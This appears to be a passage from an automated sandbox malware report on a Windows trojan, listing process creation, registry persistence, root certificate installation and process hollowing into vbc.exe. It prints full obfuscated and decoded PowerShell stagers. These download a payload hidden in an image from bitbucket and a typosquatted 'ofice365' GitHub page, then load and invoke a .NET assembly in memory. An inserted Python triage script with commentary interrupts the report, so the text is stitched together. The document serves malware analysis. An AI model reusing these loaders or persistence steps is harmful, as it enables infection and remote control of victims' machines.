n@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ
@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
            Source: SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Code function: 0_2_00007FF6A1D81D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00007FF6A1D81D28

            Persistence and Installation Behavior

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Code function: 0_2_00007FF6A1D81684 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00007FF6A1D81684
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce wextract_cleanup0

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
            Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (179 identical entries)
            Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process information set: NOOPENFILEERRORBOX (15 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 6900000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 6B00000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: 8B00000 memory reserve | memory write watch
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1110
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2127
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3576
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6265
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Check user administrative privileges: GetTokenInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7076 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep count: 3576 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196 Thread sleep count: 6265 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092 Thread sleep time: -14757395258967632s >= -30000s
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 992 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D864E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread delayed: delay time: 922337203685477
            Source: vbc.exe, 00000009.00000002.2278394361.0000000004CBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: vbc.exe, 00000009.00000002.2278394361.0000000004CBE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D81D28 memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,LocalAlloc,GetModuleFileNameA,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (2 identical entries)
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D88790 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exe Code function: 0_2_00007FF6A1D88494 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara matchFile source: amsi64_5388.amsi.csv, type: OTHER
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1352, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5388, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 40E000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 410000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4A12008Jump to behavior
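The two evidence types above, the "Thread delayed" rows at the top of this section and the "Memory written" rows just above, are worth reading together: 922337203685477 ms is .NET's TimeSpan.MaxValue expressed in milliseconds (Int64.MaxValue ticks / 10,000), i.e. a wait with no timeout rather than a sleep; and a foreign-process write whose first value is 4D5A ("MZ") at 0x400000 of a freshly started vbc.exe, followed by writes at 0x402000, 0x40E000 and 0x410000, is the shape of process hollowing (the later row where vbc.exe itself spawns XenoManager\Vbc.exe is the hollowed process carrying on). The triage script below is an added example, not part of the Joe Sandbox report or of the malware; it re-parses constructed copies of these rows (the " | " separator between the acting process and the detail is an assumption, since the report prints them run together) and flags both patterns. The 1 MiB image span used to decide which writes fall "inside" the target image is also an assumption, because the report does not state the hollowed image's size.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of this section's "Thread delayed" and "Memory written"
# entries (values copied from the report rows; the " | " separator is an assumption).
SAMPLE_EVENTS = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477",
    r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread delayed: delay time: 922337203685477",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 40E000",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 410000",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 4A12008",
]

# .NET TimeSpan.MaxValue in milliseconds: Int64.MaxValue ticks / 10,000 ticks per ms.
# A thread delay of exactly this value is a wait that never times out, not a real timer.
TIMESPAN_MAX_MS = (2**63 - 1) // 10_000  # 922337203685477

SLEEP_RE = re.compile(r"^(?P<src>.+?) \| Thread delayed: delay time: (?P<ms>\d+)$")
MEM_RE = re.compile(
    r"^(?P<src>.+?) \| Memory written: (?P<dst>.+?) base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$"
)


def classify_sleeps(events):
    """Return (process, milliseconds, label) for every "Thread delayed" entry."""
    out = []
    for line in events:
        m = SLEEP_RE.match(line)
        if not m:
            continue
        ms = int(m["ms"])
        if ms >= TIMESPAN_MAX_MS:
            label = "effectively-infinite"  # TimeSpan.MaxValue: blocks until signalled
        elif ms >= 3 * 60 * 1000:
            label = "long"                  # the sandbox's own ">= 3 min" sleep threshold
        else:
            label = "short"
        out.append((m["src"], ms, label))
    return out


def find_hollowing(events, image_span=0x100000):
    """Flag a foreign-process write pattern consistent with hollowing: an MZ header
    written to a target's image base, followed by further writes inside that image.
    image_span (assumed 1 MiB) bounds what counts as "inside"; the report gives no size."""
    writes = defaultdict(list)
    for line in events:
        m = MEM_RE.match(line)
        if m:
            writes[(m["src"], m["dst"])].append((int(m["base"], 16), m["magic"]))
    findings = []
    for (src, dst), ws in writes.items():
        mz = [w for w in ws if w[1] and w[1].upper().startswith("4D5A")]
        if not mz:
            continue
        base = mz[0][0]
        rest = [w for w in ws if w is not mz[0]]
        inside = lambda b: base <= b < base + image_span
        findings.append({
            "source": src,
            "target": dst,
            "image_base": base,
            "in_image_writes": sorted(b for b, _ in rest if inside(b)),
            "outside_writes": sorted(b for b, _ in rest if not inside(b)),
        })
    return findings


if __name__ == "__main__":
    for src, ms, label in classify_sleeps(SAMPLE_EVENTS):
        print(f"{label:22} {ms:>16} ms  {src}")
    for f in find_hollowing(SAMPLE_EVENTS):
        print(f"hollowing? {f['source']} -> {f['target']} image_base=0x{f['image_base']:X} "
              f"in_image={[hex(b) for b in f['in_image_writes']]} "
              f"outside={[hex(b) for b in f['outside_writes']]}")
```

On this section's rows the script reports one finding: powershell.exe writing an MZ header at 0x400000 of vbc.exe with four further in-image writes, plus one write at 0x4A12008 that lies well outside the image and is left uninterpreted here. Any real EDR telemetry (Sysmon Event ID 8/10, ETW-TI) carries the same fields, so the same two checks transfer directly.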
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67a7e5e159f71.vbs" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ
@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Vbc.exe"Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeProcess created: C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe "C:\Users\user\AppData\Roaming\XenoManager\Vbc.exe" Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqb